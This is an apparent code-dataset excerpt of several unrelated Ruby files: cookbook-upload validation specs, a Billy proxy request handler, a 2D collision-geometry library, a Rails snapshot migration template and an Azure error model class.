ENV["ENFORCE_PRIVACY"] = "true"
tarball = File.open("spec/support/cookbook_fixtures/private-cookbook.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Private cookbook upload not allowed")
end
it "allows private cookbook uploads if private is not being enforced" do
ENV["ENFORCE_PRIVACY"] = "false"
tarball = File.open("spec/support/cookbook_fixtures/private-cookbook.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to be_empty
end
end
it "yields the cookbook version if the cookbook and tarball are workable" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields the cookbook version when the tarball has uid/gid greater than 8^8" do
tarball = File.open("spec/support/cookbook_fixtures/big-gid.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields the cookbook version if the README has no extension" do
tarball = File.open("spec/support/cookbook_fixtures/readme-no-extension.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
version = upload.finish { |_, _, v| v }
expect(version).to be_present
end
it "yields an error if the version number is not a valid Chef version" do
tarball = build_cookbook_tarball("invalid_version") do |tar|
tar.file("metadata.json") { JSON.dump(name: "invalid_version", version: "1.2.3-rc4") }
tar.file("README.md") { "# Check for a bad version" }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(a_string_matching("not a valid Chef version"))
end
it "yields an error if the cookbook is not valid JSON" do
upload = CookbookUpload.new(user, cookbook: "ack!", tarball: "tarball")
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.cookbook_not_json"))
end
it "yields an error if the tarball does not seem to be an uploaded File" do
upload = CookbookUpload.new(user, cookbook: "{}", tarball: "cool")
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_has_no_path"))
end
it "yields an error if the tarball is not GZipped" do
tarball = File.open("spec/support/cookbook_fixtures/not-actually-gzipped.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_not_gzipped"))
end
it "yields an error if the tarball is corrupted" do
tarball = File.open("spec/support/cookbook_fixtures/corrupted-tarball.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.tarball_corrupt", error: "Damaged tar archive"))
end
it "yields an error if the tarball has no metadata.json entry" do
tarball = File.open("spec/support/cookbook_fixtures/no-metadata-or-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_metadata"))
end
it "yields an error if the tarball has no README entry" do
tarball = File.open("spec/support/cookbook_fixtures/no-metadata-or-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_readme"))
end
it "yields an error if the tarball has a zero-length README entry" do
tarball = File.open("spec/support/cookbook_fixtures/zero-length-readme.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.missing_readme"))
end
it "yields an error if the tarball's metadata.json is not actually JSON" do
tarball = File.open("spec/support/cookbook_fixtures/invalid-metadata-json.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.metadata_not_json"))
end
it "yields an error if the metadata.json has a malformed platforms hash" do
tarball = build_cookbook_tarball("bad_platforms") do |tar|
tar.file("metadata.json") { JSON.dump(name: "bad_platforms", platforms: "") }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.invalid_metadata"))
end
it "yields an error if the metadata.json has a malformed dependencies hash" do
tarball = build_cookbook_tarball("bad_dependencies") do |tar|
tar.file("metadata.json") { JSON.dump(name: "bad_dependencies", dependencies: "") }
end
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages)
.to include(I18n.t("api.error_messages.invalid_metadata"))
end
it "does not yield an error if the cookbook parameters do not specify a category" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(user, cookbook: "{}", tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to be_empty
end
it "yields an error if the cookbook parameters specify an invalid category" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
upload = CookbookUpload.new(
user,
cookbook: '{"category": "Kewl"}',
tarball: tarball
)
errors = upload.finish { |e, _| e }
error_message = I18n.t(
"api.error_messages.non_existent_category",
category_name: "Kewl"
)
expect(errors.full_messages).to include(error_message)
end
it "yields an error if the version uniqueness database constraint is violated" do
tarball = File.open("spec/support/cookbook_fixtures/redis-test-v1.tgz")
user = create(:user)
CookbookUpload.new(user, cookbook: cookbook, tarball: tarball).finish
allow_any_instance_of(ActiveRecord::Validations::UniquenessValidator)
.to receive(:validate_each)
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
message = %{
redis-test (0.1.0) already exists. A cookbook's version number must be
unique.
}.squish
expect(errors.full_messages).to include(message)
end
it "yields an error if any of the associated models have errors" do
tarball = File.open("spec/support/cookbook_fixtures/invalid-platforms-and-dependencies.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors).to_not be_empty
end
context "bad tarballs" do
it "errors if tarball is a URL" do
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: "http://nope.example.com/some.tgz")
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Multipart POST part 'tarball' must be a file.")
end
it "errors if tarball is Base64 encoded" do
tarball = Base64.encode64("I'm a naughty file.")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
errors = upload.finish { |e, _| e }
expect(errors.full_messages).to include("Multipart POST part 'tarball' must be a file.")
end
end
it "strips self-dependencies out of cookbooks on upload" do
tarball = File.open("spec/support/cookbook_fixtures/with-self-dependency.tgz")
cookbook_record = CookbookUpload.new(
user,
cookbook: cookbook,
tarball: tarball
).finish do |_, result|
result
end
expect(cookbook_record.cookbook_versions.first.cookbook_dependencies.count).to eql(0)
end
it "passes the user to #publish_version" do
tarball = File.open("spec/support/cookbook_fixtures/with-self-dependency.tgz")
upload = CookbookUpload.new(user, cookbook: cookbook, tarball: tarball)
expect_any_instance_of(Cookbook).to receive(:publish_version!).with(anything, user)
upload.finish
end
end
end
| 35.909621 | 106 | 0.672323 |
62be1e5b4cdbd3f985dad3f6eb78647784dd7b7e | 1,988 | require 'forwardable'
module Billy
  # Front-line request dispatcher for the proxy: tries the stub, cache and
  # proxy sub-handlers (in that priority order) and records every request and
  # its outcome in a RequestLog.
  class RequestHandler
    extend Forwardable
    include Handler

    # Stubbing API and request inspection are delegated to the sub-handlers.
    def_delegators :stub_handler, :stub, :unstub
    def_delegators :request_log, :requests

    # Lazily-built sub-handlers, keyed by priority group.
    def handlers
      @handlers ||= { stubs: StubHandler.new,
                      cache: CacheHandler.new,
                      proxy: ProxyHandler.new }
    end

    # Dispatches a request to the first sub-handler that produces a response
    # and marks the logged request complete with the winning handler's key.
    # Returns an error hash when no handler can serve the request, or when an
    # exception is raised while handling it.
    def handle_request(method, url, headers, body)
      request = request_log.record(method, url, headers, body)
      # Optional application hook that may rewrite the request before dispatch.
      if Billy.config.before_handle_request
        method, url, headers, body = Billy.config.before_handle_request.call(method, url, headers, body)
      end
      # Process the handlers by order of importance
      [:stubs, :cache, :proxy].each do |key|
        if (response = handlers[key].handle_request(method, url, headers, body))
          # Consistency fix: use the memoizing accessor like the rest of this
          # method instead of reading the @request_log ivar directly.
          request_log.complete(request, key)
          return response
        end
      end
      body_msg = Billy.config.cache_request_body_methods.include?(method) ? " with body '#{body}'" : ''
      request_log.complete(request, :error)
      { error: "Connection to #{url}#{body_msg} not cached and new http connections are disabled" }
    rescue => error
      { error: error.message }
    end

    # True if any sub-handler is willing to handle this request.
    def handles_request?(method, url, headers, body)
      [:stubs, :cache, :proxy].any? do |key|
        handlers[key].handles_request?(method, url, headers, body)
      end
    end

    # Memoized log of every request seen by this handler.
    def request_log
      @request_log ||= RequestLog.new
    end

    def stubs
      stub_handler.stubs
    end

    # Resets all sub-handlers and clears the request log.
    def reset
      handlers.each_value(&:reset)
      request_log.reset
    end

    def reset_stubs
      stub_handler.reset
    end

    def reset_cache
      handlers[:cache].reset
    end

    # @deprecated Use {#reset_cache}; cache files are checked dynamically.
    def restore_cache
      warn '[DEPRECATION] `restore_cache` is deprecated as cache files are dynamically checked. Use `reset_cache` if you just want to clear the cache.'
      reset_cache
    end

    private

    def stub_handler
      handlers[:stubs]
    end
  end
end
| 25.487179 | 151 | 0.64336 |
62b04c18da8b79c2d8b5f5ed7c7c6f7753312e2b | 18,840 | module GeoGeo
class Shape2D
# @return [Float]
attr_reader :left, :right, :bottom, :top, :width, :height
# @param [Float, Integer] left
# @param [Float, Integer] right
# @param [Float, Integer] bottom
# @param [Float, Integer] top
# @return [GeoGeo::Shape2D]
def initialize(left, right, bottom, top)
@left = left
@right = right
@bottom = bottom
@top = top
@width = top - bottom
@height = right - left
end
# @return [Array<Float>]
def aabb_center
[(@left + @right) / 2.0, (@top + @bottom) / 2.0]
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
@left += dx
@right += dx
@bottom += dy
@top += dy
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
raise "The method point_inside?(x,y) must be defined by the class that inherits Shape2D."
end
end
class Box < Shape2D
# @param [Float, Integer] left
# @param [Float, Integer] right
# @param [Float, Integer] bottom
# @param [Float, Integer] top
# @return [Box]
def initialize(left, right, bottom, top)
super(left, right, bottom, top)
end
# @param [Integer] x
# @param [Integer] y
# @param [Integer] w
# @param [Integer] h
# @return [GeoGeo::Box]
def Box.new_drgtk(x, y, w, h)
Box.new(x, x + w, y, y + h)
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
(@left..@right).cover?(x) && (@bottom..@top).cover?(y)
end
protected
# @return [Integer]
def __internal_test_mtx_idx
0
end
end
class Circle < Shape2D
# @return [Float]
attr_reader :x, :y, :r, :r2
# @param [Float] x
# @param [Float] y
# @param [Float] r
# @return [GeoGeo::Circle]
def initialize(x, y, r)
@x = x
@y = y
@r = r
@r2 = r * r
super(x - r, x + r, y - r, y + r)
end
# @param [Float] x
# @param [Float] y
# @return [nil]
def set_center(x, y)
shift(x - @x, y - @y)
end
# @return [Array<Float>]
def get_center
[@x, @y]
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
super(dx, dy)
@x += dx
@y += dy
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
(@x - x) * (@x - x) + (@y - y) * (@y - y) <= @r2
end
protected
# @return [Integer]
def __internal_test_mtx_idx
1
end
end
class Polygon < Shape2D
# @return [Array<Array<Float>>]
attr_reader :verts, :hull_verts, :hull_norms
# @return [Array<Float>]
attr_reader :verts_x, :hull_verts_x, :hull_norms_x, :verts_y, :hull_verts_y, :hull_norms_y
# @return [Boolean]
attr_reader :convex
# @return [Float]
attr_reader :theta
# @param [Array<Array<Float, Integer>>] verts List of vertices in clockwise order. If verts[0]!=verts[-1], a copy of the first vert will be appended.
# @param [Array<Float>] center The center point of the polygon. Defaults to the center of the AABB
# @param [Float] theta The initial angle of the polygon, in radians
# @return [GeoGeo::Polygon]
def initialize(verts, center = nil, theta = 0.0)
# trace!
@verts = verts.map(&:clone)
@verts << [*@verts[0]] if @verts[0] != @verts[-1]
@verts_x = @verts.map(&:first)
@verts_y = @verts.map(&:last)
__calc_hull
@convex = @verts == @hull_verts
@theta = theta
super(*@verts.map(&:x).minmax, *@verts.map(&:y).minmax)
# @type [Array<Float>]
@center = (center || aabb_center).clone
end
# @param [Float] theta
# @return [Float]
def theta=(theta)
d_theta = theta - @theta
return theta if d_theta == 0
c, s = Math.cos(d_theta), Math.sin(d_theta)
t, b, l, r = @center.y, @center.y, @center.x, @center.x
index = 0
limit = @verts.length
while index < limit
vx = @verts_x[index]
vy = @verts_y[index]
vx, vy = @center.x + (vx - @center.x) * c - (vy - @center.y) * s, @center.y + (vx - @center.x) * s + (vy - @center.y) * c
@verts_x[index] = vx
@verts_y[index] = vy
@verts[index] = [vx, vy]
l = vx if vx < l
r = vx if vx > r
b = vy if vy < b
t = vy if vy > t
index+=1
end
index = 0
limit = @hull_verts.length
while index < limit
vx = @hull_verts_x[index]
vy = @hull_verts_y[index]
vx, vy = @center.x + (vx - @center.x) * c - (vy - @center.y) * s, @center.y + (vx - @center.x) * s + (vy - @center.y) * c
@hull_verts_x[index] = vx
@hull_verts_y[index] = vy
@hull_verts[index] = [vx, vy]
index+=1
end
index = 0
limit = @hull_norms.length
while index < limit
vx = @hull_norms_x[index]
vy = @hull_norms_y[index]
vx, vy = vx * c - vy * s, vx * s + vy * c
@hull_norms_x[index] = vx
@hull_norms_y[index] = vy
@hull_norms[index] = [vx, vy]
index+=1
end
@left, @right, @bottom, @top, @width, @height = l, r, b, t, r - l, t - b
@theta = theta
end
# @param [Array<Float>] point
# @return [nil]
def set_center(point)
shift(point.x - @center.x, point.y - @center.y)
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
super(dx, dy)
@center.x += dx
@center.y += dy
@verts.each do |v|
v.x += dx
v.y += dy
end
@hull_verts.each do |v|
v.x += dx
v.y += dy
end
@verts_x = @verts.map(&:x)
@verts_y = @verts.map(&:y)
@hull_verts_x = @hull_verts.map(&:x)
@hull_verts_y = @hull_verts.map(&:y)
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
return false unless @left < x && x < @right && @bottom < y && y < @top
winding_number = 0
# This isn't very idiomatic ruby, but it is faster this way
index = 0
limit = @verts.length - 1
while index < limit
if @verts_y[index] <= y
winding_number += 1 if @verts_y[index + 1] > y && __left(@verts_x[index], @verts_y[index], @verts_x[index + 1], @verts_y[index + 1], x, y) > 0
else
winding_number -= 1 if @verts_y[index + 1] <= y && __left(@verts_x[index], @verts_y[index], @verts_x[index + 1], @verts_y[index + 1], x, y) < 0
end
index += 1
end
winding_number != 0
end
private
# @param [Float] ax
# @param [Float] ay
# @param [Float] bx
# @param [Float] by
# @param [Float] cx
# @param [Float] cy
# @return [Float]
def __left(ax, ay, bx, by, cx, cy)
(bx - ax) * (cy - ay) - (cx - ax) * (by - ay)
end
# @return [nil]
def __calc_hull
if @verts.length > 4
pivot = @verts[0]
@verts.each do |v|
pivot = [*v] if v.y < pivot.y || (v.y == pivot.y && v.x < pivot.x)
end
points = @verts.map do |v|
{x: [*v], y: [Math.atan2(v.y - pivot.y, v.x - pivot.x), (v.x - pivot.x) * (v.x - pivot.x) + (v.y - pivot.y) * (v.y - pivot.y)]}
end.sort_by(&:y)
# @type [Array] points
points = points.map(&:x)
hull_verts = []
hull_verts_x = []
hull_verts_y = []
points.each do |v|
vx = v.x
vy = v.y
if hull_verts.length < 3
if hull_verts[-1] != v
hull_verts.push([*v])
hull_verts_x.push(vx)
hull_verts_y.push(vy)
end
else
while __left(hull_verts_x[-2], hull_verts_y[-2], hull_verts_x[-1], hull_verts_y[-1], vx, vy) < 0
hull_verts.pop
hull_verts_x.pop
hull_verts_y.pop
end
if hull_verts[-1] != v
hull_verts.push([*v])
hull_verts_x.push(vx)
hull_verts_y.push(vy)
end
end
end
@hull_verts = hull_verts
@hull_verts_x = hull_verts_x
@hull_verts_y = hull_verts_y
if @hull_verts.length + 1 == @verts.length
tmp = @hull_verts.index(@verts[0])
@hull_verts.rotate!(tmp)
@hull_verts_x.rotate!(tmp)
@hull_verts_y.rotate!(tmp)
end
@hull_verts.push([*@hull_verts[0]])
@hull_verts_x.push(@hull_verts_x[0])
@hull_verts_y.push(@hull_verts_y[0])
else
@hull_verts = @verts.map(&:clone)
@hull_verts_x = @verts_x.clone
@hull_verts_y = @verts_y.clone
end
@hull_norms = @hull_verts.each_cons(2).map do
# @type [Array<Float>] v1
# @type [Array<Float>] v2
|v1, v2|
# @type [Array<Float>] norm
norm = [v2.y - v1.y, v1.x - v2.x]
# @type [Array<Float>] norm
norm = [-norm.x, -norm.y] if norm.x < 0
nx = norm.x
ny = norm.y
mag = Math.sqrt((nx * nx) + (ny * ny))
norm.x /= mag
norm.y /= mag
norm
end.uniq
@hull_norms_x = @hull_norms.map(&:first)
@hull_norms_y = @hull_norms.map(&:last)
end
protected
# @return [Integer]
def __internal_test_mtx_idx
2
end
end
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] a
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] b
# @return [Boolean]
def GeoGeo::intersect?(a, b)
#noinspection RubyResolve
GeoGeo::MagicHelper.intersect?(a, b)
end
end
# Hide away all the internal logic
# Internal collision-test implementation. Dispatches on the two shapes' matrix
# indices and implements pairwise tests (AABB, circle distance, SAT, winding).
class GeoGeoHelper
  # Dispatch matrix: TestMtx[a_idx][b_idx] names the pairwise test method.
  TestMtx = [
    [:box_intersect?, :box_circ_intersect?, :box_poly_intersect?],
    [:circ_box_intersect?, :circ_intersect?, :circ_poly_intersect?],
    [:poly_box_intersect?, :poly_circ_intersect?, :poly_intersect?],
  ]
  # Dispatches to the type-specific test for the shape pair.
  # Bugfix: __internal_test_mtx_idx is a *protected* method on the shape
  # classes, and under MRI a protected method cannot be called with an explicit
  # receiver from an unrelated class like this helper — so read it via #send.
  # @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] a
  # @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] b
  # @return [Boolean]
  def intersect?(a, b)
    self.send(GeoGeoHelper::TestMtx[a.send(:__internal_test_mtx_idx)][b.send(:__internal_test_mtx_idx)], a, b)
  end
  # Axis-aligned bounding-box overlap test (inclusive edges).
  # @param [GeoGeo::Shape2D] a
  # @param [GeoGeo::Shape2D] b
  # @return [Boolean]
  def aabb_intersect?(a, b)
    (a.left <= b.right) && (b.left <= a.right) && (a.bottom <= b.top) && (b.bottom <= a.top)
  end
  # @param [GeoGeo::Box] a
  # @param [GeoGeo::Box] b
  # @return [Boolean]
  def box_intersect?(a, b)
    aabb_intersect?(a, b)
  end
  # Box/circle test: clamp the circle center to the box and compare the
  # squared distance to the squared radius.
  # @param [GeoGeo::Box] a
  # @param [GeoGeo::Circle] b
  # @return [Boolean]
  def box_circ_intersect?(a, b)
    # AABBxAABB test to trivially reject.
    return false unless aabb_intersect?(a, b)
    dx = b.x - (b.x < a.left ? a.left : b.x > a.right ? a.right : b.x)
    dy = b.y - (b.y < a.bottom ? a.bottom : b.y > a.top ? a.top : b.y)
    return dx * dx + dy * dy <= b.r2
  end
  # Box/polygon test via Cohen–Sutherland-style outcodes on the polygon's
  # vertices, then clipped edge checks.
  # NOTE(review): the clipping phase uses Numeric#greater/#lesser and Array#x/#y
  # (DragonRuby GTK core extensions) — confirm before use outside DragonRuby.
  # @param [GeoGeo::Box] a
  # @param [GeoGeo::Polygon] b
  # @return [Boolean]
  def box_poly_intersect?(a, b)
    return false unless aabb_intersect?(a, b)
    # Test if the box is inside the polygon
    return true if b.point_inside?(a.left, a.top)
    #return true if b.point_inside?(a.right, a.top)
    #return true if b.point_inside?(a.left, a.bottom)
    #return true if b.point_inside?(a.right, a.bottom)
    # TODO: This feels like it is hilariously over engineered.
    # Assign each polygon vertex a 4-bit outcode describing where it sits
    # relative to the box (left/right/below/above).
    index = 0
    limit = b.verts.length
    cs_verts = Array.new(b.verts.length)
    while index < limit
      vx = b.verts_x[index]
      vy = b.verts_y[index]
      code = 0b0000
      if vx < a.left
        code |= 0b0001
      elsif vx > a.right
        code |= 0b0010
      end
      if vy < a.bottom
        code |= 0b0100
      elsif vy > a.top
        code |= 0b1000
      end
      return true if code == 0b0000 # Vertex within box indicates collision. Return early
      cs_verts[index] = [vx, vy, code]
      index += 1
    end
    # Keep only edges whose endpoints do not share an outside half-plane
    # (code1 & code2 == 0); edges that do share one cannot cross the box.
    index = 0
    limit = cs_verts.length - 1
    cs_edges = []
    while index < limit
      cs_edges << [cs_verts[index], cs_verts[index + 1]] if 0b0000 == cs_verts[index][2] & cs_verts[index + 1][2]
      index += 1
    end
    # Test if any lines trivially cross opposite bounds, return early if so
    index = 0
    limit = cs_edges.length
    while index < limit
      return true if cs_edges[index][0][2] | cs_edges[index][1][2] == 0b0011 || cs_edges[index][0][2] | cs_edges[index][1][2] == 0b1100
      index += 1
    end
    # Test if any lines non-trivially cross a relevant boundary
    index = 0
    limit = cs_edges.length
    while index < limit
      # @type [Array<Float>] p1
      # @type [Array<Float>] p2
      p1, p2 = cs_edges[index]
      x_min, x_max = p1.x, p2.x
      x_min, x_max = x_max, x_min if (x_min > x_max)
      x_min, x_max = x_min.greater(a.left), x_max.lesser(a.right)
      return false if x_min > x_max
      y_min, y_max = p1.y, p2.y
      dx = p2.x - p1.x
      if dx.abs > 0.0000001
        ma = (p2.y - p1.y) / dx
        mb = p1.y - ma * p1.x
        y_min = ma * x_min + mb
        y_max = ma * x_max + mb
      end
      y_min, y_max = y_max, y_min if (y_min > y_max)
      y_max = y_max.lesser(a.top)
      y_min = y_min.greater(a.bottom)
      return true if y_min <= y_max
      index += 1
    end
    false
  end
  # @param [GeoGeo::Circle] a
  # @param [GeoGeo::Box] b
  # @return [Boolean]
  def circ_box_intersect?(a, b)
    box_circ_intersect?(b, a)
  end
  # Circle/circle test: squared center distance vs. squared radius sum.
  # @param [GeoGeo::Circle] a
  # @param [GeoGeo::Circle] b
  # @return [Boolean]
  def circ_intersect?(a, b)
    # Don't do a preliminary AABB test here. It makes things slower.
    dx = a.x - b.x
    dy = a.y - b.y
    dx * dx + dy * dy <= (a.r + b.r) * (a.r + b.r)
  end
  # Circle/polygon test: center containment, then per-edge closest-point
  # distance checks against the squared radius.
  # @param [GeoGeo::Circle] a
  # @param [GeoGeo::Polygon] b
  # @return [Boolean]
  def circ_poly_intersect?(a, b)
    return false unless aabb_intersect?(a, b)
    return true if b.point_inside?(a.x, a.y)
    index = 0
    limit = b.verts.length - 1
    while index < limit
      # @type p1 [Array<Float>]
      # @type p2 [Array<Float>]
      # p1, p2 = b.verts.values_at(index, index+1)
      p1x = b.verts_x[index]
      p1y = b.verts_y[index]
      p2x = b.verts_x[index + 1]
      p2y = b.verts_y[index + 1]
      acx = a.x - p1x
      acy = a.y - p1y
      return true if acx * acx + acy * acy <= a.r2 # Vert in circle. Early return
      abx = p2x - p1x
      aby = p2y - p1y
      # Project the center onto the edge segment and clamp to its extent.
      t = ((acx * abx + acy * aby) / (abx * abx + aby * aby)).clamp(0, 1)
      tmp1 = (abx * t + p1x) - a.x
      tmp2 = (aby * t + p1y) - a.y
      return true if (tmp1 * tmp1 + tmp2 * tmp2) <= a.r2
      index += 1
    end
    false
  end
  # @param [GeoGeo::Polygon] a
  # @param [GeoGeo::Box] b
  # @return [Boolean]
  def poly_box_intersect?(a, b)
    box_poly_intersect?(b, a)
  end
  # @param [GeoGeo::Polygon] a
  # @param [GeoGeo::Circle] b
  # @return [Boolean]
  def poly_circ_intersect?(a, b)
    circ_poly_intersect?(b, a)
  end
  # Polygon/polygon test: SAT on the convex hulls, then (for concave shapes)
  # containment and perimeter-crossing checks.
  # @param [GeoGeo::Polygon] a
  # @param [GeoGeo::Polygon] b
  # @return [Boolean]
  def poly_intersect?(a, b)
    return false unless aabb_intersect?(a, b)
    # TODO: Polygons
    # Phase 1: SAT test with the convex hulls. If the convex hulls don't collide, the polygons don't collide.
    return false unless sat_intersect?(a.hull_norms_x,a.hull_norms_y, a.hull_verts_x,a.hull_verts_y, b.hull_verts_x,b.hull_verts_y)
    return false unless sat_intersect?(b.hull_norms_x,b.hull_norms_y, a.hull_verts_x,a.hull_verts_y, b.hull_verts_x,b.hull_verts_y)
    return true if a.convex && b.convex # If both are convex, SAT is all you need to see if they are colliding.
    # Phase 2: Check if one covers the other, using the first vert as a proxy.
    return true if a.point_inside?(b.verts_x[0], b.verts_y[0]) || b.point_inside?(a.verts_x[0], a.verts_y[0])
    # Phase 3: Check if the two perimeters overlap.
    index = 0
    limit = a.verts.length - 1
    jimit = b.verts.length - 1
    while index < limit
      jndex = 0
      e1x1 = a.verts_x[index]
      e1x2 = a.verts_x[index+1]
      e1y1 = a.verts_y[index]
      e1y2 = a.verts_y[index+1]
      while jndex < jimit
        return true if line_line_intersect?(e1x1,e1y1,e1x2,e1y2,b.verts_x[jndex],b.verts_y[jndex],b.verts_x[jndex+1],b.verts_y[jndex+1])
        jndex += 1
      end
      index += 1
    end
    false
  end
  private
  # Dot product of two 2-element vectors.
  # NOTE(review): uses Array#x/#y (DragonRuby core extensions).
  # @param [Array<Float>] v1
  # @param [Array<Float>] v2
  # @return [Float]
  def dot(v1, v2)
    (v1.x * v2.x) + (v1.y * v2.y)
  end
  # True when the triangle a->b->c winds counter-clockwise.
  # @param [Float] ax
  # @param [Float] ay
  # @param [Float] bx
  # @param [Float] by
  # @param [Float] cx
  # @param [Float] cy
  # @return [Boolean]
  def ccw?(ax, ay, bx, by, cx, cy)
    (cy - ay) * (bx - ax) > (by - ay) * (cx - ax)
  end
  # Segment/segment intersection via the orientation (ccw) test.
  # @param [Float] ax1
  # @param [Float] ay1
  # @param [Float] ax2
  # @param [Float] ay2
  # @param [Float] bx1
  # @param [Float] by1
  # @param [Float] bx2
  # @param [Float] by2
  # @return [Boolean]
  def line_line_intersect?(ax1,ay1,ax2,ay2,bx1,by1,bx2,by2)
    ccw?(ax1, ay1, bx1, by1, bx2, by2) != ccw?(ax2, ay2, bx1, by1, bx2, by2) && ccw?(ax1, ay1, ax2, ay2, bx1, by1) != ccw?(ax1, ay1, ax2, ay2, bx2, by2)
  end
  # Separating Axis Theorem: projects both vertex sets onto every axis and
  # reports false as soon as a separating axis (disjoint projections) exists.
  # @param [Array<Float>] axes_x
  # @param [Array<Float>] axes_y
  # @param [Array<Float>] vert_ax
  # @param [Array<Float>] vert_ay
  # @param [Array<Float>] vert_bx
  # @param [Array<Float>] vert_by
  # @return [Boolean]
  def sat_intersect?(axes_x,axes_y,vert_ax,vert_ay, vert_bx,vert_by)
    index, limit = 0, axes_x.length
    while index < limit
      axis_x = axes_x[index]
      axis_y = axes_y[index]
      # Test to see if the polygons do *not* overlap on this axis.
      a_min, a_max = 1e300, -1e300
      jndex, jimit = 0, vert_ax.length
      while jndex < jimit
        tmp = axis_x * vert_ax[jndex] + axis_y * vert_ay[jndex]
        a_min = tmp if tmp < a_min
        a_max = tmp if tmp > a_max
        jndex += 1
      end
      b_min, b_max = 1e300, -1e300
      jndex, jimit = 0, vert_bx.length
      while jndex < jimit
        tmp = axis_x * vert_bx[jndex] + axis_y * vert_by[jndex]
        b_min = tmp if tmp < b_min
        b_max = tmp if tmp > b_max
        jndex += 1
      end
      return false if (a_min > b_max) || (b_min > a_max) # A separating axis exists. Thus, they cannot be intersecting.
      index += 1
    end
    true
  end
end
# Installs a single shared helper instance as GeoGeo::MagicHelper via
# const_set, keeping the helper out of code-completion listings for the gem's
# public namespace.
# TODO: consider a less sneaky way to wire this up.
GeoGeo.const_set("MagicHelper", GeoGeoHelper.new) unless GeoGeo.const_defined?(:MagicHelper)
| 29.074074 | 153 | 0.562049 |
4a8ca070190839e8304a28fce5c0a1c793442e0e | 622 | class <%= migration_class_name %> < ActiveRecord::Migration<%= migration_version %>
  # Creates the snapshots table for the generated model, including one jsonb
  # column per has_one/has_many relation captured at snapshot time.
  def change
    create_table :<%= model_underscored %>_snapshots do |t|
      # model to be snapshotted
      t.references :<%= model_underscored %>, index: true, null: false, foreign_key: true
      # snapshotted attributes (serialized copy of the record)
      t.jsonb :object, null: false
      <% relations_has_one.each do |relation| %>
      t.jsonb :<%= relation.underscore %>_object<% end %>
      <% relations_has_many.each do |relation| %>
      t.jsonb :<%= relation.underscore %>_object, array: true, default: []<% end %>
      t.timestamps null: false
    end
  end
end | 36.588235 | 89 | 0.660772 |
6150078cbb1b524e6ca9692fb8e8ab2d996f9f91 | 1,099 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Reservations::Mgmt::V2017_11_01
module Models
#
# Model object.
#
#
class Error
include MsRestAzure
# @return [ExtendedErrorInfo]
attr_accessor :error
#
# Mapper for Error class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Error',
type: {
name: 'Composite',
class_name: 'Error',
model_properties: {
error: {
client_side_validation: true,
required: false,
serialized_name: 'error',
type: {
name: 'Composite',
class_name: 'ExtendedErrorInfo'
}
}
}
}
}
end
end
end
end
| 22.428571 | 70 | 0.517743 |
